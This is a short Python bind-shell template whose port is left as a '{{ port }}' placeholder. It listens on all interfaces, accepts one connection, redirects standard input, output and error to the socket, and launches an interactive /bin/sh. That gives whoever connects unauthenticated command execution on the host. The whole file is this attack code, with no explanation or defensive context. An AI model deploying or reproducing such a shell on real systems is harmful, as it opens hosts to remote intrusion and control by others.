import socket
import subprocess
import os

def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(('0.0.0.0', {{ port }}))
    s.listen(1)
    conn, addr = s.accept()
    
    os.dup2(conn.fileno(), 0)
    os.dup2(conn.fileno(), 1)
    os.dup2(conn.fileno(), 2)
    
    subprocess.call(["/bin/sh", "-i"])

if __name__ == "__main__":
    main()
